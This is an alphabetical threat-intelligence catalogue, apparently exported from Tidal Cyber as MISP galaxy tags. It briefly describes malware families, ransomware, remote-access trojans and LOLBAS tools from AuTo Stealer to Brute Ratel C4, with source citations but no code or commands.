[AuTo Stealer](https://app.tidalcyber.com/software/649a4cfc-c0d0-412d-a28c-1bd4ed604ea8) is malware written in C++ that has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 to target government agencies and personnel in India and Afghanistan.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:software="AuTo Stealer"

Avaddon

[Avaddon](https://app.tidalcyber.com/software/bad92974-35f6-4183-8024-b629140c6ee6) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.<sup>[[Awake Security Avaddon](https://app.tidalcyber.com/references/c113cde7-5dd5-45e9-af16-3ab6ed0b1728)]</sup><sup>[[Arxiv Avaddon Feb 2021](https://app.tidalcyber.com/references/dbee8e7e-f477-4bd5-8225-84e0e222617e)]</sup>

The tag is: misp-galaxy:software="Avaddon"

Avenger

The tag is: misp-galaxy:software="Avenger"

AvosLocker

[AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.<sup>[[Malwarebytes AvosLocker Jul 2021](https://app.tidalcyber.com/references/88dffb14-a7a7-5b36-b269-8283dec0f1a3)]</sup><sup>[[Trend Micro AvosLocker Apr 2022](https://app.tidalcyber.com/references/01fdc732-0951-59e2-afaf-5fe761357e7f)]</sup><sup>[[Joint CSA AvosLocker Mar 2022](https://app.tidalcyber.com/references/8ad57a0d-d74f-5802-ab83-4ddac1beb083)]</sup>

The tag is: misp-galaxy:software="AvosLocker"

Azorult

[Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been seen used for cryptocurrency theft. <sup>[[Unit42 Azorult Nov 2018](https://app.tidalcyber.com/references/44ceddf6-bcbf-4a60-bb92-f8cdc675d185)]</sup><sup>[[Proofpoint Azorult July 2018](https://app.tidalcyber.com/references/a85c869a-3ba3-42c2-9460-d3d1f0874044)]</sup>

The tag is: misp-galaxy:software="Azorult"

Babyk - Associated Software

<sup>[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)]</sup><sup>[[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]</sup><sup>[[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]</sup>

The tag is: misp-galaxy:software="Babyk - Associated Software"

Vasa Locker - Associated Software

The tag is: misp-galaxy:software="Vasa Locker - Associated Software"

Babuk

[Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.<sup>[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)]</sup><sup>[[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]</sup><sup>[[CyberScoop Babuk February 2021](https://app.tidalcyber.com/references/0a0aeacd-0976-4c84-b40d-5704afca9f0e)]</sup>

The tag is: misp-galaxy:software="Babuk"

BabyShark

[BabyShark](https://app.tidalcyber.com/software/ebb824a2-abff-4bfd-87f0-d63cb02b62e6) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. <sup>[[Unit42 BabyShark Feb 2019](https://app.tidalcyber.com/references/634404e3-e2c9-4872-a280-12d2be168cba)]</sup>

The tag is: misp-galaxy:software="BabyShark"

BackConfig

The tag is: misp-galaxy:software="BackConfig"

Havex - Associated Software

The tag is: misp-galaxy:software="Havex - Associated Software"

Backdoor.Oldrea

[Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) is a modular backdoor that has been used by [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) against energy companies since at least 2013. [Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]</sup>

The tag is: misp-galaxy:software="Backdoor.Oldrea"

Lecna - Associated Software

The tag is: misp-galaxy:software="Lecna - Associated Software"

BACKSPACE

The tag is: misp-galaxy:software="BACKSPACE"

Backstab

Backstab is a tool used to terminate antimalware-protected processes.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Backstab"

BADCALL

The tag is: misp-galaxy:software="BADCALL"

BADFLICK

[BADFLICK](https://app.tidalcyber.com/software/8c454294-81cb-45d0-b299-818994ad3e6f) is a backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.<sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[Accenture MUDCARP March 2019](https://app.tidalcyber.com/references/811d433d-27a4-4411-8ec9-b3a173ba0033)]</sup>

The tag is: misp-galaxy:software="BADFLICK"

BADHATCH

[BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) is a backdoor that has been utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) since at least 2019. [BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.<sup>[[Gigamon BADHATCH Jul 2019](https://app.tidalcyber.com/references/69a45479-e982-58ee-9e2d-caaf825f0ad4)]</sup><sup>[[BitDefender BADHATCH Mar 2021](https://app.tidalcyber.com/references/958cfc9a-901c-549d-96c2-956272b240e3)]</sup>

The tag is: misp-galaxy:software="BADHATCH"

BADNEWS

[BADNEWS](https://app.tidalcyber.com/software/34c24d27-c779-42a4-9f61-3f0d3fea6fd4) is malware that has been used by the actors responsible for the [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="BADNEWS"

BadPatch

[BadPatch](https://app.tidalcyber.com/software/10e76722-4b52-47f6-9276-70e95fecb26b) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.<sup>[[Unit 42 BadPatch Oct 2017](https://app.tidalcyber.com/references/9c294bf7-24ba-408a-90b8-5b9885838e1b)]</sup>

The tag is: misp-galaxy:software="BadPatch"

Win32/Diskcoder.D - Associated Software

The tag is: misp-galaxy:software="Win32/Diskcoder.D - Associated Software"

Bad Rabbit

[Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) has also targeted organizations and consumers in Russia. <sup>[[Secure List Bad Rabbit](https://app.tidalcyber.com/references/f4cec03a-ea94-4874-9bea-16189e967ff9)]</sup><sup>[[ESET Bad Rabbit](https://app.tidalcyber.com/references/a9664f01-78f0-4461-a757-12f54ec99a56)]</sup><sup>[[Dragos IT ICS Ransomware](https://app.tidalcyber.com/references/60187301-8d70-4023-8e6d-59cbb1468f0d)]</sup>

The tag is: misp-galaxy:software="Bad Rabbit"

Bandook

[Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) has been used by [Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14), as well as in a separate campaign referred to as "Operation Manul".<sup>[[EFF Manul Aug 2016](https://app.tidalcyber.com/references/311a3863-3897-4ddf-a251-d0467a56675f)]</sup><sup>[[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)]</sup><sup>[[CheckPoint Bandook Nov 2020](https://app.tidalcyber.com/references/352652a9-86c9-42e1-8ee0-968180c6a51e)]</sup>

The tag is: misp-galaxy:software="Bandook"

Trojan Manuscript - Associated Software

The tag is: misp-galaxy:software="Trojan Manuscript - Associated Software"

Bankshot

[Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) used the [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) implant in attacks against the Turkish financial sector. <sup>[[McAfee Bankshot](https://app.tidalcyber.com/references/c748dc6c-8c19-4a5c-840f-3d47955a6c78)]</sup>

The tag is: misp-galaxy:software="Bankshot"

Bash.exe - Associated Software

<sup>[[Bash.exe - LOLBAS Project](/references/7d3efbc7-6abf-4f3f-aec8-686100bb90ad)]</sup>

The tag is: misp-galaxy:software="Bash.exe - Associated Software"

Bash

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File used by Windows subsystem for Linux

Author: Oddvar Moe

Paths:
* C:\Windows\System32\bash.exe
* C:\Windows\SysWOW64\bash.exe

The tag is: misp-galaxy:software="Bash"

Bat Armor

Bat Armor is a tool used to generate .bat files using PowerShell scripts.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Bat Armor"

Team9 - Associated Software

The tag is: misp-galaxy:software="Team9 - Associated Software"

KEGTAP - Associated Software

<sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:software="KEGTAP - Associated Software"

Bazar

[Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) reportedly has ties to [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.<sup>[[Cybereason Bazar July 2020](https://app.tidalcyber.com/references/8819875a-5139-4dae-94c8-e7cc9f847580)]</sup>

The tag is: misp-galaxy:software="Bazar"

BBK

The tag is: misp-galaxy:software="BBK"

BBSRAT

[BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) is malware with remote access tool functionality that has been used in targeted compromises. <sup>[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]</sup>

The tag is: misp-galaxy:software="BBSRAT"

BendyBear

[BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) shares a variety of features with [Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030), malware previously attributed to the Chinese cyber espionage group BlackTech.<sup>[[Unit42 BendyBear Feb 2021](https://app.tidalcyber.com/references/f5cbc08f-6f2c-4c81-9d68-07f61e16f138)]</sup>

The tag is: misp-galaxy:software="BendyBear"

Bginfo.exe - Associated Software

<sup>[[Bginfo.exe - LOLBAS Project](/references/ca1eaac2-7449-4a76-bec2-9dc5971fd808)]</sup>

The tag is: misp-galaxy:software="Bginfo.exe - Associated Software"

Bginfo

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Background Information Utility included with SysInternals Suite

Author: Oddvar Moe

Paths:
* No fixed path

The tag is: misp-galaxy:software="Bginfo"

BianLian Ransomware (Backdoor)

This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup><sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>

Delivers: TeamViewer<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, Atera Agent<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, Splashtop<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, AnyDesk<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="BianLian Ransomware (Backdoor)"

BISCUIT

The tag is: misp-galaxy:software="BISCUIT"

Bisonal

[Bisonal](https://app.tidalcyber.com/software/b898816e-610f-4c2f-9045-d9f28a54ee58) is a remote access tool (RAT) that has been used by [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.<sup>[[Unit 42 Bisonal July 2018](https://app.tidalcyber.com/references/30b2ec12-b785-43fb-ab72-b37387046d15)]</sup><sup>[[Talos Bisonal Mar 2020](https://app.tidalcyber.com/references/eaecccff-e0a0-4fa0-81e5-799b23c26b5a)]</sup>

The tag is: misp-galaxy:software="Bisonal"

FriedEx - Associated Software

<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="FriedEx - Associated Software"

wp_encrypt - Associated Software

<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="wp_encrypt - Associated Software"

BitPaymer

[BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) has several indicators suggesting overlap with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) malware and is often delivered via [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2).<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="BitPaymer"

Bitsadmin.exe - Associated Software

The tag is: misp-galaxy:software="Bitsadmin.exe - Associated Software"

BITSAdmin

The tag is: misp-galaxy:software="BITSAdmin"

Black Basta

[Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) RaaS operators could include current or former members of the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) group.<sup>[[Palo Alto Networks Black Basta August 2022](https://app.tidalcyber.com/references/fc9ee531-3680-549b-86e0-a10a70c3ec67)]</sup><sup>[[Deep Instinct Black Basta August 2022](https://app.tidalcyber.com/references/72b64d7d-f8eb-54d3-83c8-a883906ceea1)]</sup><sup>[[Minerva Labs Black Basta May 2022](https://app.tidalcyber.com/references/6358f7ed-41d6-56be-83bb-179e0a8b7873)]</sup><sup>[[Avertium Black Basta June 2022](https://app.tidalcyber.com/references/31c2ef62-2852-5418-9d52-2479a3a619d0)]</sup><sup>[[NCC Group Black Basta June 2022](https://app.tidalcyber.com/references/b5f91f77-b102-5812-a79f-69b254487da8)]</sup><sup>[[Cyble Black Basta May 2022](https://app.tidalcyber.com/references/18035aba-0ae3-58b8-b426-86c2e38a37ae)]</sup>

The tag is: misp-galaxy:software="Black Basta"

ALPHV - Associated Software

The tag is: misp-galaxy:software="ALPHV - Associated Software"

Noberus - Associated Software

The tag is: misp-galaxy:software="Noberus - Associated Software"

BlackCat

[BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed in November 2021, [BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.<sup>[[Microsoft BlackCat Jun 2022](https://app.tidalcyber.com/references/55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e)]</sup><sup>[[Sophos BlackCat Jul 2022](https://app.tidalcyber.com/references/481a0106-d5b6-532c-8f5b-6c0c477185f4)]</sup><sup>[[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]</sup>

The tag is: misp-galaxy:software="BlackCat"

BLACKCOFFEE

[BLACKCOFFEE](https://app.tidalcyber.com/software/e85e2fca-9347-4448-bfc1-342f29d5d6a1) is malware that has been used by several Chinese groups since at least 2013. <sup>[[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]</sup> <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="BLACKCOFFEE"

Black Energy - Associated Software

The tag is: misp-galaxy:software="Black Energy - Associated Software"

BlackEnergy

[BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. <sup>[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]</sup>

The tag is: misp-galaxy:software="BlackEnergy"

BlackMould

[BlackMould](https://app.tidalcyber.com/software/da348a51-d047-4144-9ba4-34d2ce964a11) is a web shell based on [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) against telecommunication providers.<sup>[[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)]</sup>

The tag is: misp-galaxy:software="BlackMould"

BLINDINGCAN

[BLINDINGCAN](https://app.tidalcyber.com/software/1af8ea81-40df-4fba-8d63-1858b8b31217) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.<sup>[[US-CERT BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/0421788c-b807-4e19-897c-bfb4323feb16)]</sup><sup>[[NHS UK BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/acca4c89-acce-4916-88b6-f4dac7d8ab19)]</sup>

The tag is: misp-galaxy:software="BLINDINGCAN"

BloodHound

[BloodHound](https://app.tidalcyber.com/software/72658763-8077-451e-8572-38858f8cacf3) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.<sup>[[GitHub Bloodhound](https://app.tidalcyber.com/references/e90b4941-5dff-4f38-b4dd-af3426fd621e)]</sup><sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup><sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:software="BloodHound"

BLUELIGHT

[BLUELIGHT](https://app.tidalcyber.com/software/3aaaaf86-638b-4a65-be18-c6e6dcdcdb97) is a remote access Trojan used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that was first observed in early 2021.<sup>[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]</sup>

The tag is: misp-galaxy:software="BLUELIGHT"

Bonadan

[Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.<sup>[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]</sup>

The tag is: misp-galaxy:software="Bonadan"

BONDUPDATER

[BONDUPDATER](https://app.tidalcyber.com/software/d8690218-5272-47d8-8189-35d3b518e66f) is a PowerShell backdoor used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.<sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Palo Alto OilRig Sep 2018](https://app.tidalcyber.com/references/2ec6eabe-92e2-454c-ba7b-b27fec5b428d)]</sup>

The tag is: misp-galaxy:software="BONDUPDATER"

BoomBox

[BoomBox](https://app.tidalcyber.com/software/9d393f6f-855e-4348-8a26-008174e3605a) is a downloader responsible for executing next stage components that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.<sup>[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)]</sup>

The tag is: misp-galaxy:software="BoomBox"

BOOSTWRITE

[BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.<sup>[[FireEye FIN7 Oct 2019](https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]</sup>

The tag is: misp-galaxy:software="BOOSTWRITE"

BOOTRASH

[BOOTRASH](https://app.tidalcyber.com/software/d47a4753-80f5-494e-aad7-d033aaff0d6d) is a [Bootkit](https://app.tidalcyber.com/technique/032985de-5e09-4889-b8c4-84d940c6346c) that targets Windows operating systems. It has been used by threat actors that target the financial sector.<sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup><sup>[[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]</sup><sup>[[FireEye BOOTRASH SANS](https://app.tidalcyber.com/references/835c9e5d-b291-43d9-9b8a-2978aa8c8cd3)]</sup>

The tag is: misp-galaxy:software="BOOTRASH"

BoxCaon

[BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) is a Windows backdoor that was used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71)'s name stems from similarities shared with the malware family xCaon.<sup>[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup>

The tag is: misp-galaxy:software="BoxCaon"

Brave Prince

[Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263), and was seen along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations surrounding the 2018 Pyeongchang Winter Olympics. <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="Brave Prince"

Briba

[Briba](https://app.tidalcyber.com/software/7942783c-73a7-413c-94d1-8981029a1c51) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor and download files on to compromised hosts. <sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup> <sup>[[Symantec Briba May 2012](https://app.tidalcyber.com/references/bcf0f82b-1b26-4c0c-905e-0dd8b88d0903)]</sup>

The tag is: misp-galaxy:software="Briba"

BRc4 - Associated Software

<sup>[[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)]</sup>

The tag is: misp-galaxy:software="BRc4 - Associated Software"

Brute Ratel C4

